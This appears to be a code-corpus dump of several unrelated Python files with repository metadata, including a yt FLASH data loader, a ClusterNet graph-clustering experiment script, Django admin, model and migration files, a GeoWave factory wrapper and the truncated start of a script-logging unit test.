if hasattr(pval, "decode"):
pval = pval.decode("ascii", "ignore")
self.parameters[vn] = pval
# Determine block size
try:
nxb = self.parameters["nxb"]
nyb = self.parameters["nyb"]
nzb = self.parameters["nzb"]
except KeyError:
nxb, nyb, nzb = (
int(self._handle["/simulation parameters"][f"n{ax}b"]) for ax in "xyz"
) # FLASH2 only!
# Determine dimensionality
try:
dimensionality = self.parameters["dimensionality"]
except KeyError:
dimensionality = 3
if nzb == 1:
dimensionality = 2
if nyb == 1:
dimensionality = 1
if dimensionality < 3:
mylog.warning("Guessing dimensionality as %s", dimensionality)
self.dimensionality = dimensionality
self.geometry = self.parameters["geometry"]
# Determine base grid parameters
if "lrefine_min" in self.parameters.keys(): # PARAMESH
nblockx = self.parameters["nblockx"]
nblocky = self.parameters["nblocky"]
nblockz = self.parameters["nblockz"]
else: # Uniform Grid
nblockx = self.parameters["iprocs"]
nblocky = self.parameters["jprocs"]
nblockz = self.parameters["kprocs"]
# In case the user wasn't careful
if self.dimensionality <= 2:
nblockz = 1
if self.dimensionality == 1:
nblocky = 1
# Determine domain boundaries
dle = np.array([self.parameters[f"{ax}min"] for ax in "xyz"]).astype("float64")
dre = np.array([self.parameters[f"{ax}max"] for ax in "xyz"]).astype("float64")
if self.dimensionality < 3:
for d in [dimensionality] + list(range(3 - dimensionality)):
if dle[d] == dre[d]:
mylog.warning(
"Identical domain left edge and right edges "
"along dummy dimension (%i), attempting to read anyway",
d,
)
dre[d] = dle[d] + 1.0
if self.dimensionality < 3 and self.geometry == "cylindrical":
mylog.warning("Extending theta dimension to 2PI + left edge.")
dre[2] = dle[2] + 2 * np.pi
elif self.dimensionality < 3 and self.geometry == "polar":
mylog.warning("Extending theta dimension to 2PI + left edge.")
dre[1] = dle[1] + 2 * np.pi
elif self.dimensionality < 3 and self.geometry == "spherical":
mylog.warning("Extending phi dimension to 2PI + left edge.")
dre[2] = dle[2] + 2 * np.pi
if self.dimensionality == 1 and self.geometry == "spherical":
mylog.warning("Extending theta dimension to PI + left edge.")
dre[1] = dle[1] + np.pi
self.domain_left_edge = dle
self.domain_right_edge = dre
self.domain_dimensions = np.array([nblockx * nxb, nblocky * nyb, nblockz * nzb])
# Try to determine Gamma
try:
self.gamma = self.parameters["gamma"]
except Exception:
mylog.info("Cannot find Gamma")
pass
# Get the simulation time
self.current_time = self.parameters["time"]
# Determine if this is a periodic box
p = [
self.parameters.get(f"{ax}l_boundary_type", None) == "periodic"
for ax in "xyz"
]
self._periodicity = tuple(p)
# Determine cosmological parameters.
try:
self.parameters["usecosmology"]
self.cosmological_simulation = 1
self.current_redshift = 1.0 / self.parameters["scalefactor"] - 1.0
self.omega_lambda = self.parameters["cosmologicalconstant"]
self.omega_matter = self.parameters["omegamatter"]
self.hubble_constant = self.parameters["hubbleconstant"]
self.hubble_constant *= cm_per_mpc * 1.0e-5 * 1.0e-2 # convert to 'h'
except Exception:
self.current_redshift = 0.0
self.omega_lambda = 0.0
self.omega_matter = 0.0
self.hubble_constant = 0.0
self.cosmological_simulation = 0
@classmethod
def _is_valid(cls, filename, *args, **kwargs):
try:
fileh = HDF5FileHandler(filename)
if "bounding box" in fileh["/"].keys():
return True
except (OSError, ImportError):
pass
return False
@classmethod
def _guess_candidates(cls, base, directories, files):
candidates = [
_ for _ in files if ("_hdf5_plt_cnt_" in _) or ("_hdf5_chk_" in _)
]
# Typically, Flash won't have nested outputs.
return candidates, (len(candidates) == 0)
def close(self):
self._handle.close()
class FLASHParticleFile(ParticleFile):
pass
class FLASHParticleDataset(FLASHDataset):
_index_class = ParticleIndex
filter_bbox = False
_file_class = FLASHParticleFile
def __init__(
self,
filename,
dataset_type="flash_particle_hdf5",
storage_filename=None,
units_override=None,
index_order=None,
index_filename=None,
unit_system="cgs",
):
self.index_order = validate_index_order(index_order)
self.index_filename = index_filename
if self._handle is not None:
return
self._handle = HDF5FileHandler(filename)
self.refine_by = 2
Dataset.__init__(
self,
filename,
dataset_type,
units_override=units_override,
unit_system=unit_system,
)
self.storage_filename = storage_filename
def _parse_parameter_file(self):
# Let the superclass do all the work but then
# fix the domain dimensions
super()._parse_parameter_file()
domain_dimensions = np.zeros(3, "int32")
domain_dimensions[: self.dimensionality] = 1
self.domain_dimensions = domain_dimensions
self.filename_template = self.parameter_filename
self.file_count = 1
@classmethod
def _is_valid(cls, filename, *args, **kwargs):
warn_h5py(filename)
try:
fileh = HDF5FileHandler(filename)
if (
"bounding box" not in fileh["/"].keys()
and "localnp" in fileh["/"].keys()
):
return True
except (OSError, ImportError):
pass
return False
@classmethod
def _guess_candidates(cls, base, directories, files):
candidates = [_ for _ in files if "_hdf5_part_" in _]
# Typically, Flash won't have nested outputs.
return candidates, (len(candidates) == 0)
| 38.03125
| 88
| 0.548649
|
61eebe20a08fe467ba98f06fdd75ab35ae20588a
| 100
|
py
|
Python
|
src/associations/admin.py
|
codacy-badger/hbscorez
|
215e4d2617ac9be91bb9d561bbfc552349cd4781
|
[
"MIT"
] | 12
|
2018-03-20T21:38:53.000Z
|
2021-10-31T10:00:12.000Z
|
src/associations/admin.py
|
codacy-badger/hbscorez
|
215e4d2617ac9be91bb9d561bbfc552349cd4781
|
[
"MIT"
] | 79
|
2018-03-18T14:26:47.000Z
|
2022-03-01T15:51:40.000Z
|
src/associations/admin.py
|
codacy-badger/hbscorez
|
215e4d2617ac9be91bb9d561bbfc552349cd4781
|
[
"MIT"
] | 4
|
2018-05-18T15:39:56.000Z
|
2020-10-29T09:28:41.000Z
|
from django.contrib import admin
from .models import Association
admin.site.register(Association)
| 16.666667
| 32
| 0.83
|
2cbcdd913913e88463399e07575b6a9bd2e61922
| 21,719
|
py
|
Python
|
experiments_singlegraph.py
|
wangshgeo/clusternet
|
06904af279b4d98d894f3e33173ece2d62cffa2d
|
[
"MIT"
] | null | null | null |
experiments_singlegraph.py
|
wangshgeo/clusternet
|
06904af279b4d98d894f3e33173ece2d62cffa2d
|
[
"MIT"
] | null | null | null |
experiments_singlegraph.py
|
wangshgeo/clusternet
|
06904af279b4d98d894f3e33173ece2d62cffa2d
|
[
"MIT"
] | null | null | null |
from pygcn import load_data
import torch
import argparse
import numpy as np
import torch.optim as optim
import torch.nn as nn
import sklearn
from kcenter import make_all_dists, greedy_kcenter, gonzalez_kcenter, CenterObjective, make_dists_igraph, rounding
from models import GCNLink, GCNClusterNet, GCNDeep, GCNDeepSigmoid, GCN
from utils import make_normalized_adj, negative_sample, edge_dropout, load_nofeatures
from modularity import baseline_spectral, partition, greedy_modularity_communities, make_modularity_matrix
from loss_functions import loss_kcenter, loss_modularity
parser = argparse.ArgumentParser()
parser.add_argument('--no-cuda', action='store_true', default=True,
help='Disables CUDA training.')
parser.add_argument('--seed', type=int, default=24, help='Random seed.')
parser.add_argument('--lr', type=float, default=0.01,
help='Initial learning rate.')
parser.add_argument('--weight_decay', type=float, default=5e-4,
help='Weight decay (L2 loss on parameters).')
parser.add_argument('--hidden', type=int, default=50,
help='Number of hidden units.')
parser.add_argument('--dropout', type=float, default=0.5,
help='Dropout rate (1 - keep probability).')
parser.add_argument('--embed_dim', type=int, default=50,
help='Dimensionality of node embeddings')
parser.add_argument('--K', type=int, default=5,
help='How many partitions')
parser.add_argument('--negsamplerate', type=int, default=1,
help='How many negative examples to include per positive in link prediction training')
parser.add_argument('--edge_dropout', type=float, default=0.2,
help='Rate at which to remove edges in link prediction training')
parser.add_argument('--objective', type=str, default='modularity',
help='What objective to optimize (currently kenter or modularity)')
parser.add_argument('--dataset', type=str, default='citeseer',
help='which network to load')
parser.add_argument('--clustertemp', type=float, default=30,
help='how hard to make the softmax for the cluster assignments')
parser.add_argument('--kcentertemp', type=float, default=100,
help='how hard to make seed selection softmax assignment')
parser.add_argument('--kcentermintemp', type=float, default=0,
help='how hard to make the min over nodes in kcenter training objective')
parser.add_argument('--train_pct', type=float, default=0.4, help='percent of total edges in training set')
parser.add_argument('--calculate_opt', action='store_true', default=False, help='calculate opt')
parser.add_argument('--pure_opt', action='store_true', default=False, help='do only optimization, no link prediction needed')
parser.add_argument('--use_igraph', action='store_true', default=True, help='use igraph to compute shortest paths in twostage kcenter')
parser.add_argument('--run_ts', action='store_true', default=False, help='do only optimization, no link prediction needed')
parser.add_argument('--train_iters', type=int, default=1001,
help='number of training iterations')
parser.add_argument('--num_cluster_iter', type=int, default=1,
help='number of iterations for clustering')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
print(args.cuda)
if torch.cuda.is_available():
args.cuda = True# args.no_cuda and torch.cuda.is_available()
print(args.cuda)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.cuda:
torch.cuda.manual_seed(args.seed)
pure_opt = args.pure_opt
reload_data = True
test_cluster_auc = False
calculate_opt = args.calculate_opt
make_objectives = False
if reload_data:
make_objectives = True
calculate_dists = False
run_decision = True
run_ts = args.run_ts
run_gcne2e = True
run_train_only = True
has_features = True
##############################################################################
#LOAD DATA
##############################################################################
train_pct = args.train_pct
if reload_data:
if has_features:
adj_test, features_test, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}_test_{:.2f}'.format(args.dataset, train_pct))
adj_valid, features_valid, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}_valid_{:.2f}'.format(args.dataset, train_pct))
adj_train, features_train, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}_train_{:.2f}'.format(args.dataset, train_pct))
else:
adj_all, features, labels = load_nofeatures(args.dataset, '')
features_train = features
features_test = features
n = adj_all.shape[0]
adj_train, features, labels = load_nofeatures(args.dataset, '_train_{:.2f}'.format(train_pct), n)
adj_test, features, labels = load_nofeatures(args.dataset, '_test_{:.2f}'.format(train_pct), n)
adj_valid, features, labels = load_nofeatures(args.dataset, '_valid_{:.2f}'.format(train_pct), n)
adj_test = adj_test.coalesce()
adj_valid = adj_valid.coalesce()
adj_train = adj_train.coalesce()
n = adj_train.shape[0]
K = args.K
bin_adj_test = (adj_test.to_dense() > 0).float()
bin_adj_train = (adj_train.to_dense() > 0).float()
m_train = bin_adj_train.sum()
bin_adj_valid = (adj_valid.to_dense() > 0).float()
bin_adj_all = (bin_adj_train + bin_adj_test + bin_adj_valid > 0).float()
adj_all = make_normalized_adj(bin_adj_all.nonzero(), n)
nfeat = features_test.shape[1]
adj_all, features_test, labels, idx_train, idx_val, idx_test = load_data('data/{}/'.format(args.dataset), '{}'.format(args.dataset))
adj_all = adj_all.coalesce()
adj_test = adj_all
bin_adj_all = (adj_all.to_dense() > 0).float()
n = adj_all.shape[0]
K= args.K
nfeat = features_test.shape[1]
##############################################################################
#INITIALIZE MODELS
##############################################################################
# Model and optimizer
model_ts = GCNLink(nfeat=nfeat,
nhid=args.hidden,
nout=args.embed_dim,
dropout=args.dropout)
model_cluster = GCNClusterNet(nfeat=nfeat,
nhid=args.hidden,
nout=args.embed_dim,
dropout=args.dropout,
K = args.K,
cluster_temp = args.clustertemp)
#keep a couple of initializations here so that the random seeding lines up
#with results reported in the paper -- removing these is essentially equivalent to
#changing the seed
_ = GCN(nfeat, args.hidden, args.embed_dim, args.dropout)
_ = nn.Parameter(torch.rand(K, args.embed_dim))
#uses GCNs to predict the cluster membership of each node
model_gcn = GCNDeep(nfeat=nfeat,
nhid=args.hidden,
nout=args.K,
dropout=args.dropout,
nlayers=2)
#uses GCNs to predict the probability that each node appears in the solution
model_gcn_x = GCNDeepSigmoid(nfeat=nfeat,
nhid=args.hidden,
nout=1,
dropout=args.dropout,
nlayers=2)
if args.objective == 'kcenter':
model_gcn = model_gcn_x
optimizer = optim.Adam(model_cluster.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
if args.cuda:
model_cluster.cuda()
model_ts.cuda()
features = features.cuda()
adj_train = adj_train.cuda()
labels = labels.cuda()
idx_train = idx_train.cuda()
idx_val = idx_val.cuda()
idx_test = idx_test.cuda()
losses = []
losses_test = []
num_cluster_iter = args.num_cluster_iter
##############################################################################
#MAKE AUXILIARY DATA FOR OBJECTIVES
##############################################################################
if make_objectives:
if args.objective == 'kcenter':
try:
dist_all = torch.load('{}_test_dist.pt'.format(args.dataset))
dist_train = torch.load('{}_{}_train_dist.pt'.format(args.dataset, train_pct))
diameter = dist_all.max()
except:
dist_all = make_all_dists(bin_adj_all, 100)
diameter = dist_all[dist_all < 100].max()
dist_all[dist_all == 100] = diameter
torch.save(dist_all, '{}_test_dist.pt'.format(args.dataset))
dist_train = make_all_dists(bin_adj_train, 100)
dist_train[dist_train == 100] = diameter
torch.save(dist_train, '{}_{}_train_dist.pt'.format(args.dataset, train_pct))
obj_train = CenterObjective(dist_train, diameter, args.kcentermintemp)
obj_train_hardmax = CenterObjective(dist_train, diameter, args.kcentermintemp, hardmax=True)
obj_test = CenterObjective(dist_all, diameter, args.kcentertemp, hardmax=True)
obj_test_softmax = CenterObjective(dist_all, diameter, args.kcentermintemp)
if args.objective == 'modularity':
mod_train = make_modularity_matrix(bin_adj_train)
mod_test = make_modularity_matrix(bin_adj_test)
mod_valid = make_modularity_matrix(bin_adj_valid)
mod_all = make_modularity_matrix(bin_adj_all)
##############################################################################
#DEFINE LOSS FUNCTIONS
##############################################################################
if args.objective == 'modularity':
loss_fn = loss_modularity
test_object = mod_all
train_object = mod_train
test_only_object = mod_test
valid_object = mod_valid
elif args.objective == 'kcenter':
loss_fn = loss_kcenter
test_object= obj_test
train_object = obj_train
test_only_object = None
valid_object = None
else:
raise Exception('unknown objective')
##############################################################################
#TRAIN DECISION-FOCUSED
##############################################################################
#Decision-focused training
best_train_val = 100
if run_decision:
for t in range(args.train_iters):
#pure optimization setting: get loss with respect to the full graph
if pure_opt:
mu, r, embeds, dist = model_cluster(features_test, adj_all, num_cluster_iter)
loss = loss_fn(mu, r, embeds, dist, bin_adj_all, test_object, args)
#link prediction setting: get loss with respect to training edges only
else:
mu, r, embeds, dist = model_cluster(features_train, adj_train, num_cluster_iter)
loss = loss_fn(mu, r, embeds, dist, bin_adj_train, train_object, args)
if args.objective != 'kcenter':
loss = -loss
optimizer.zero_grad()
loss.backward()
#increase number of clustering iterations after 500 updates to fine-tune
#solution
if t == 500:
num_cluster_iter = 5
#every 100 iterations, look and see if we've improved on the best training loss
#seen so far. Keep the solution with best training value.
if t % 100 == 0:
#round solution to discrete partitioning
if args.objective == 'modularity':
r = torch.softmax(100*r, dim=1)
#evalaute test loss -- note that the best solution is
#chosen with respect training loss. Here, we store the test loss
#of the currently best training solution
loss_test = loss_fn(mu, r, embeds, dist, bin_adj_all, test_object, args)
#for k-center problem, keep track of the fractional x with best
#training loss, to do rounding after
if loss.item() < best_train_val:
best_train_val = loss.item()
curr_test_loss = loss_test.item()
#convert distances into a feasible (fractional x)
x_best = torch.softmax(dist*args.kcentertemp, 0).sum(dim=1)
x_best = 2*(torch.sigmoid(4*x_best) - 0.5)
if x_best.sum() > K:
x_best = K*x_best/x_best.sum()
losses.append(loss.item())
optimizer.step()
#for k-center: round 50 times and take the solution with best training
#value
if args.objective == 'kcenter':
testvals = []; trainvals = []
for _ in range(50):
y = rounding(x_best)
testvals.append(obj_test(y).item())
trainvals.append(obj_train(y).item())
print('ClusterNet value', testvals[np.argmin(trainvals)])
if args.objective == 'modularity':
print('ClusterNet value', curr_test_loss)
##############################################################################
#TRAIN TWO-STAGE
##############################################################################
def train_twostage(model_ts):
optimizer_ts = optim.Adam(model_ts.parameters(),
lr=args.lr, weight_decay=args.weight_decay)
edges = adj_train.indices().t()
edges_test = adj_test.indices().t()
edges_test_eval, labels_test_eval = negative_sample(edges_test, 1, bin_adj_train)
# print(edges_test_eval)
for t in range(300):
adj_input = make_normalized_adj(edge_dropout(edges, args.edge_dropout), n)
edges_eval, labels = negative_sample(edges, args.negsamplerate, bin_adj_train)
preds = model_ts(features_train, adj_input, edges_eval)
loss = torch.nn.BCEWithLogitsLoss()(preds, labels)
optimizer_ts.zero_grad()
loss.backward()
if t % 10 == 0:
preds_test_eval = model_ts(features_train, adj_input, edges_test_eval)
test_ce = torch.nn.BCEWithLogitsLoss()(preds_test_eval, labels_test_eval)
test_auc = sklearn.metrics.roc_auc_score(labels_test_eval.long().detach().numpy(), nn.Sigmoid()(preds_test_eval).detach().numpy())
print(t, loss.item(), test_ce.item(), test_auc)
optimizer_ts.step()
if test_cluster_auc:
model_linkpred = GCNLink(nfeat=nfeat,
nhid=args.hidden,
nout=args.embed_dim,
dropout=args.dropout)
model_linkpred.GCN = model_cluster.GCN
model_linkpred.GCN.requires_grad = False
train_twostage(model_linkpred)
calculate_ts_performance = False
if run_ts:
print('two stage')
train_twostage(model_ts)
#predict probability that all unobserved edges exist
indices = torch.tensor(np.arange(n))
to_pred = torch.zeros(n**2, 2)
to_pred[:, 1] = indices.repeat(n)
for i in range(n):
to_pred[i*n:(i+1)*n, 0] = i
to_pred = to_pred.long()
preds = model_ts(features_train, adj_train, to_pred)
preds = nn.Sigmoid()(preds).view(n, n)
preds = bin_adj_train + (1 - bin_adj_train)*preds
if args.objective == 'modularity':
r = greedy_modularity_communities(preds, K)
print('agglomerative', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
r = partition(preds, K)
print('recursive', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
degrees = preds.sum(dim=1)
preds = torch.diag(1./degrees)@preds
mod_pred = make_modularity_matrix(preds)
r = baseline_spectral(mod_pred, K)
print('spectral', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
elif args.objective == 'kcenter':
try:
dist_ts = torch.load('{}_twostage_dist.pt'.format(args.dataset))
print('loaded ts dists from {}'.format('{}_twostage_dist.pt'.format(args.dataset)))
except:
print('making dists')
if args.use_igraph:
print('using igraph')
dist_ts = make_dists_igraph(preds)
else:
print('using networkx')
dist_ts = make_all_dists(preds, 100)
diameter = dist_ts[dist_ts < 100].max()
dist_ts[dist_ts == 100] = diameter
print('made dists')
torch.save(dist_ts, '{}_twostage_dist.pt'.format(args.dataset))
dist_ts = dist_ts.float()
diameter = dist_ts.max()
x = gonzalez_kcenter(dist_ts, K)
print('gonzalez ts', obj_train_hardmax(x), obj_test(x))
print(dist_ts.type(), diameter.type())
x = greedy_kcenter(dist_ts, diameter, K)
print('greedy ts', obj_train_hardmax(x), obj_test(x))
##############################################################################
#TRAIN END-TO-END GCN
##############################################################################
if run_gcne2e:
print('just GCN')
optimizer_gcn = optim.Adam(model_gcn.parameters(), lr = args.lr,
weight_decay = args.weight_decay)
if args.objective == 'modularity':
best_train_val = 0
if args.objective == 'kcenter':
best_train_val = 100
for t in range(1000):
best_train_loss = 100
if pure_opt:
if args.objective == 'modularity' or args.objective == 'maxcut':
r = model_gcn(features_test, adj_all)
r = torch.softmax(args.clustertemp*r, dim = 1)
loss = -loss_fn(None, r, None, None, bin_adj_train, train_object, args)
elif args.objective == 'kcenter' or args.objecive == 'influmax':
x = model_gcn(features_test, adj_all)
if x.sum() > K:
x = K*x/x.sum()
loss = -test_object(x)
else:
if args.objective == 'modularity' or args.objective == 'maxcut':
r = model_gcn(features_train, adj_train)
r = torch.softmax(r, dim = 1)
loss = -loss_fn(None, r, None, None, bin_adj_train, train_object, args)
elif args.objective == 'kcenter' or args.objecive == 'influmax':
x = model_gcn(features_train, adj_train)
if x.sum() > K:
x = K*x/x.sum()
loss = -train_object(x)
if args.objective == 'kcenter':
loss = -loss
optimizer.zero_grad()
loss.backward()
if t % 100 == 0:
if args.objective == 'modularity' or args.objective == 'maxcut':
r = torch.softmax(100*r, dim=1)
loss_test = loss_fn(None, r, None, None, bin_adj_all, test_object, args)
loss_test_only = loss_fn(None, r, None, None, bin_adj_test, test_only_object, args)
elif args.objective == 'kcenter' or args.objecive == 'influmax':
loss_test = -test_object(x)
loss_test_only = torch.tensor(0).float()
losses_test.append(loss_test.item())
print(t, loss.item(), loss_test.item(), loss_test_only.item())
if loss.item() < best_train_val:
curr_test_loss = loss_test.item()
best_train_val = loss.item()
if args.objective == 'kcenter' or args.objective == 'influmax':
x_best = x
losses.append(loss.item())
optimizer.step()
if args.objective == 'kcenter':
from influmax import rounding
testvals = []; trainvals = []; trainvalshardmax = []
for _ in range(50):
y = rounding(x_best)
testvals.append(obj_test(y).item())
trainvals.append(obj_train(y).item())
trainvalshardmax.append(obj_train_hardmax(y).item())
print('train min', testvals[np.argmin(trainvals)])
print('hardmax train min', testvals[np.argmin(trainvalshardmax)])
print('absolute min', min(testvals))
if args.objective == 'modularity':
print('train min', curr_test_loss)
##############################################################################
#TRAIN-ONLY BASELINE
##############################################################################
if run_train_only:
if args.objective == 'modularity':
preds = bin_adj_train
r = greedy_modularity_communities(preds, K)
print('agglomerative', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
r = partition(preds, K)
print('recursive', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
degrees = preds.sum(dim=1)
preds = torch.diag(1./degrees)@preds
mod_pred = make_modularity_matrix(preds)
r = baseline_spectral(mod_pred, K)
print('spectral', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
elif args.objective == 'kcenter':
x = gonzalez_kcenter(dist_train, K)
print('gonzalez train', obj_test(x))
x = greedy_kcenter(dist_train, diameter, K)
print('greedy train', obj_test(x))
##############################################################################
#RUN BASELINE OPTIMIZATION ALGORITHMS ON FULL GRAPH
##############################################################################
if calculate_opt:
if args.objective == 'modularity':
preds = bin_adj_all
r = greedy_modularity_communities(preds, K)
print('agglomerative', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
r = partition(preds, K)
print('recursive', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
degrees = preds.sum(dim=1)
preds = torch.diag(1./degrees)@preds
mod_pred = make_modularity_matrix(preds)
r = baseline_spectral(mod_pred, K)
print('spectral', loss_fn(None, r, None, None, bin_adj_all, test_object, args))
elif args.objective == 'kcenter':
x = gonzalez_kcenter(dist_all, K)
print('gonzalez all', obj_test(x))
x = greedy_kcenter(dist_all, diameter, K)
print('greedy all', obj_test(x))
| 43.61245
| 167
| 0.607026
|
8cc92739898e560a182b7af4b9579515e47e8dfd
| 110
|
py
|
Python
|
debug_diverse_data.py
|
williamdjones/proteinbinding
|
853d8c81afb19c6d8de9be7080ae00a54836dda1
|
[
"MIT"
] | 1
|
2018-03-14T02:26:17.000Z
|
2018-03-14T02:26:17.000Z
|
debug_diverse_data.py
|
williamdjones/proteinbinding
|
853d8c81afb19c6d8de9be7080ae00a54836dda1
|
[
"MIT"
] | 9
|
2017-03-23T15:48:15.000Z
|
2017-04-20T16:37:49.000Z
|
debug_diverse_data.py
|
williamdjones/protein_binding
|
853d8c81afb19c6d8de9be7080ae00a54836dda1
|
[
"MIT"
] | null | null | null |
import pandas as pd
import os
docking_df = pd.read_csv("data/diverse/docking_features_diverse_subset.csv")
| 15.714286
| 76
| 0.809091
|
6ddec07e10f79c4dbf7b96e57c3594dd8f99f0f9
| 1,313
|
py
|
Python
|
python/src/main/python/pygw/store/data_store_factory.py
|
Maxar-Corp/sh-geowave
|
675781d3898b50c09ee66f57e74cf788286b05d5
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pygw/store/data_store_factory.py
|
Maxar-Corp/sh-geowave
|
675781d3898b50c09ee66f57e74cf788286b05d5
|
[
"Apache-2.0"
] | null | null | null |
python/src/main/python/pygw/store/data_store_factory.py
|
Maxar-Corp/sh-geowave
|
675781d3898b50c09ee66f57e74cf788286b05d5
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2013-2020 Contributors to the Eclipse Foundation
#
# See the NOTICE file distributed with this work for additional information regarding copyright
# ownership. All rights reserved. This program and the accompanying materials are made available
# under the terms of the Apache License, Version 2.0 which accompanies this distribution and is
# available at http://www.apache.org/licenses/LICENSE-2.0.txt
#===============================================================================================
from pygw.config import geowave_pkg
from .data_store import DataStore
from .data_store_options import DataStoreOptions
class DataStoreFactory():
"""
Factory class for creating a data store from a given set of options.
"""
@classmethod
def create_data_store(cls, options):
"""
Creates a data store from a set of options for a specific backend type.
Args:
options (pygw.store.data_store_options.DataStoreOptions): The options for the data store.
Returns:
The `pygw.store.data_store.DataStore` referenced by the given options.
"""
assert isinstance(options, DataStoreOptions)
j_ds = geowave_pkg.core.store.api.DataStoreFactory.createDataStore(options._java_ref)
return DataStore(j_ds)
| 38.617647
| 101
| 0.678599
|
4e4feeb853ab1749a6f011e2ea5852f46e743cac
| 1,709
|
py
|
Python
|
app/core/migrations/0001_initial.py
|
FabianIAM12/recipe-app-api
|
a529248270db2220a5936fa4c662091048f2c0bf
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
FabianIAM12/recipe-app-api
|
a529248270db2220a5936fa4c662091048f2c0bf
|
[
"MIT"
] | null | null | null |
app/core/migrations/0001_initial.py
|
FabianIAM12/recipe-app-api
|
a529248270db2220a5936fa4c662091048f2c0bf
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.15 on 2020-07-05 17:59
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0009_alter_user_last_name_max_length'),
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('email', models.EmailField(max_length=255, unique=True)),
('name', models.CharField(max_length=255)),
('is_active', models.BooleanField(default=True)),
('is_staff', models.BooleanField(default=False)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'abstract': False,
},
),
]
| 50.264706
| 266
| 0.63897
|
8952078bcaa4f85bb92e1fccbf2222a2d363abf3
| 77
|
py
|
Python
|
a/a.py
|
bosichong/17python.com
|
378754e1288b444ab3657093aa18b7e3f03b5145
|
[
"Apache-2.0"
] | 9
|
2017-09-02T05:54:06.000Z
|
2019-04-11T02:34:41.000Z
|
a/a.py
|
bosichong/17python.com
|
378754e1288b444ab3657093aa18b7e3f03b5145
|
[
"Apache-2.0"
] | null | null | null |
a/a.py
|
bosichong/17python.com
|
378754e1288b444ab3657093aa18b7e3f03b5145
|
[
"Apache-2.0"
] | 6
|
2017-10-25T02:47:45.000Z
|
2019-12-21T06:35:01.000Z
|
#codeing=utf-8
M_TEST = 888
def print_text():
print('这a.py下的一个打印文字函数')
| 11
| 28
| 0.675325
|
eb14086ff15c64e7bfb89902408e5d51db6bbc70
| 780
|
py
|
Python
|
vb_baseapp/management/template_structures/models/basemodel.py
|
vbyazilim/django-vb-baseapp
|
83a62a9d7cb349351ea64aeeb616afe9a94cda5d
|
[
"MIT"
] | null | null | null |
vb_baseapp/management/template_structures/models/basemodel.py
|
vbyazilim/django-vb-baseapp
|
83a62a9d7cb349351ea64aeeb616afe9a94cda5d
|
[
"MIT"
] | 1
|
2021-10-30T16:44:15.000Z
|
2021-10-30T16:44:15.000Z
|
vb_baseapp/management/template_structures/models/basemodel.py
|
vbyazilim/django-vb-baseapp
|
83a62a9d7cb349351ea64aeeb616afe9a94cda5d
|
[
"MIT"
] | null | null | null |
"""
CustomBaseModel template for model generator
"""
TEMPLATE_MODEL_BASEMODEL = """import logging
from django.db import models
from django.utils.translation import ugettext_lazy as _
from console import console
from vb_baseapp.models import CustomBaseModel
__all__ = ['{model_name_for_class}']
logger = logging.getLogger('app')
console = console(source=__name__)
class {model_name_for_class}(CustomBaseModel):
title = models.CharField(max_length=255, verbose_name=_('title'))
class Meta:
app_label = '{app_name}'
verbose_name = _('{model_name_for_verbose_name}')
verbose_name_plural = _('{model_name_for_verbose_name}s') # check pluralization
def __str__(self):
return self.title
"""
__all__ = ['TEMPLATE_MODEL_BASEMODEL']
| 22.941176
| 88
| 0.739744
|
b760623ef755302886e03e31c2a12ee7fc1ecd9a
| 13,086
|
py
|
Python
|
src/tests/execution_logging_test.py
|
dendisuhubdy/script-server
|
3ffb2e6afdc1672a6ed3e56dcc31ff1794785142
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
src/tests/execution_logging_test.py
|
dendisuhubdy/script-server
|
3ffb2e6afdc1672a6ed3e56dcc31ff1794785142
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
src/tests/execution_logging_test.py
|
dendisuhubdy/script-server
|
3ffb2e6afdc1672a6ed3e56dcc31ff1794785142
|
[
"Apache-2.0",
"CC0-1.0"
] | null | null | null |
import os
import unittest
import uuid
from datetime import datetime, timedelta
from execution.logging import ScriptOutputLogger, ExecutionLoggingService, OUTPUT_STARTED_MARKER, \
PostExecutionInfoProvider, LogNameCreator
from react.observable import Observable
from tests import test_utils
from utils import file_utils, audit_utils
from utils.date_utils import get_current_millis, ms_to_datetime, to_millis
class TestScriptOutputLogging(unittest.TestCase):
def test_open(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.assertTrue(self.is_file_opened())
def test_close(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.close()
self.assertFalse(self.is_file_opened())
def test_simple_log(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.push('some text')
self.output_stream.close()
self.assertEqual(self.read_log(), 'some text')
def test_multiple_logs(self):
self.output_logger = self.create_logger()
self.output_logger.start()
self.output_stream.push('some text')
self.output_stream.push('\nand a new line')
self.output_stream.push(' with some long long text')
self.output_stream.close()
self.assertEqual(self.read_log(), 'some text\nand a new line with some long long text')
def test_log_without_open(self):
